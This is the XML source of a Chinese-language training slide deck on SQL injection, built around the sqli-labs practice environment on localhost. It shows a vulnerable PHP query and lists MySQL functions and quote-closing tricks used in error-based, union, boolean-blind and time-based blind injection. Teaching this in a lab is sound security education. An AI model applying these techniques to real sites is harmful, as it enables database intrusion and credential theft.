              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>此上例中，如输入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http://localhost/sqli-labs/Less-9/?id=1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http://localhost/sqli-labs/Less-9/?id=22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>页面相同。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>但是，加入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函数后，前者页面延时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>秒展示，后者则直接展示（不延时）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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r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-labs 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755651" y="1752601"/>
            <a:ext cx="10769600" cy="676275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>各种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注入类型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500313"/>
            <a:ext cx="74168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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLi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-labs 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环境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755651" y="1752601"/>
            <a:ext cx="3149600" cy="2105025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>WEB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16388" name="图片 3" descr="C:\Users\ADMINI~1\AppData\Local\Temp\WeChat Files\933ae8d7929da07d93b8008638353c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1" y="2143125"/>
            <a:ext cx="50927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什么是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注入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用户输入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 smtClean="0"/>
              <a:t>合法性问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p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 smtClean="0"/>
              <a:t>权限问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数据库查询执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>管理员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Error Based-string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类型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755652" y="1752600"/>
            <a:ext cx="10483849" cy="1962150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>字符串</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单引号</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>胡乱输入导致不闭合</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如何闭合？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Error Based-Integer</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4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整数不需要引</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>有时可直接算术运算</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>较容易注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>类型转换时，会忽略一些东西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smtClean="0"/>
              <a:t>1a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>直接转成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1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Error Based-string(with Twist)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字符型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>还是单引号，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>加入括号进行闭合。</a:t>
            </a:r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Error Based-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>DoubleQuotes</a:t>
            </a:r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 String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双引号</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>基于错误</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>字符串型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Double Query single Quotes string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单引号</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>基于错误</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>字符串型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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Double Query Double </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Queotes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> string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双引号</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>括号</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>闭合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Blind-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>boolian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 –single Quotes-string</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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去除反馈 盲注</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单引号</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>字符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Blind-time based-single quotes-String</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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盲注</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>基于时间 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单引号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页使用数据库示例：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 smtClean="0"/>
              <a:t>$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=“select * from users where id=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>’ limit 0,1;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$result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mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($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en-US" altLang="zh-CN" dirty="0" smtClean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$row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mysql_fetch_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean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/>
              <a:t>…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/>
              <a:t>			$row[‘username’]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/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>			$row[‘password’]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的一些函数与用法（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Version()  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数据库版本获取</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>User() </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>返回当前用户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的一些函数与用法（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Database()  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-469900">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>当前 数据库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Limit </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>分批获得数据 如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>limit 0,1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的一些函数与用法（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Union    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>联合 （多字段）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Group_concat( )  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>一次性获得  （单字段）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的一些函数与用法（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Count </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>列名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Rand</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Group_by</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Order_by</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Floor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800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>关于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zh-CN" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>的一些函数与用法（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zh-CN" sz="4800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zh-CN" altLang="en-US" sz="4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Sleep(s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>静止等待</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>s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en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>if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If(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>逻辑表达式，返回值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，返回值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5670</TotalTime>
  <Words>865</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>194</Paragraphs>
  <Slides>38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包裹</vt:lpstr>
      <vt:lpstr>幻灯片 1</vt:lpstr>
      <vt:lpstr>幻灯片 2</vt:lpstr>
      <vt:lpstr>什么是SQL注入</vt:lpstr>
      <vt:lpstr>WEB页使用数据库示例：</vt:lpstr>
      <vt:lpstr>关于SQL的一些函数与用法（1）</vt:lpstr>
      <vt:lpstr>关于SQL的一些函数与用法（2）</vt:lpstr>
      <vt:lpstr>关于SQL的一些函数与用法（3）</vt:lpstr>
      <vt:lpstr>关于SQL的一些函数与用法（4）</vt:lpstr>
      <vt:lpstr>关于SQL的一些函数与用法（5）</vt:lpstr>
      <vt:lpstr>关于SQL注入相关的注释（1）</vt:lpstr>
      <vt:lpstr>关于SQL注入相关的注释（2）</vt:lpstr>
      <vt:lpstr>关于数据库系统的自带库、表</vt:lpstr>
      <vt:lpstr>SQL注入时的种种</vt:lpstr>
      <vt:lpstr>问题： 如何构造SQL查询语句</vt:lpstr>
      <vt:lpstr>问题： 如何利用网页上的报错信息</vt:lpstr>
      <vt:lpstr>问题： 如何利用SQL语句中注释功能？</vt:lpstr>
      <vt:lpstr>问题： 如何让构造的SQL查询语句 不报语法错</vt:lpstr>
      <vt:lpstr>问题： 数据库一些相关函数、变量：</vt:lpstr>
      <vt:lpstr>问题： 数据库的information_schema 是什么？</vt:lpstr>
      <vt:lpstr>问题： 数据库的表，表名是什么？</vt:lpstr>
      <vt:lpstr>问题： 数据库的表，表中有多少条记录，多少行？</vt:lpstr>
      <vt:lpstr>问题： 数据库的表，表中都有几个字段？</vt:lpstr>
      <vt:lpstr>问题： 数据库的表，表中字段 </vt:lpstr>
      <vt:lpstr>问题：  没有报错信息时，应该怎么办？</vt:lpstr>
      <vt:lpstr>问题：  没有报错信息时，应该怎么办？</vt:lpstr>
      <vt:lpstr>问题：  没有报错信息时，应该怎么办？</vt:lpstr>
      <vt:lpstr>问题：  没有报错信息，也没有布尔型真和假的区别，应该怎么办？</vt:lpstr>
      <vt:lpstr>SQLi-labs </vt:lpstr>
      <vt:lpstr>SQLi-labs 环境</vt:lpstr>
      <vt:lpstr>Error Based-string类型</vt:lpstr>
      <vt:lpstr>Error Based-Integer</vt:lpstr>
      <vt:lpstr>Error Based-string(with Twist)</vt:lpstr>
      <vt:lpstr>Error Based-DoubleQuotes String</vt:lpstr>
      <vt:lpstr>Double Query single Quotes string</vt:lpstr>
      <vt:lpstr>Double Query Double Queotes string</vt:lpstr>
      <vt:lpstr>Blind-boolian –single Quotes-string</vt:lpstr>
      <vt:lpstr>Blind-time based-single quotes-String</vt:lpstr>
      <vt:lpstr>幻灯片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1090</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-12-27T05:32:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-14T07:25:11Z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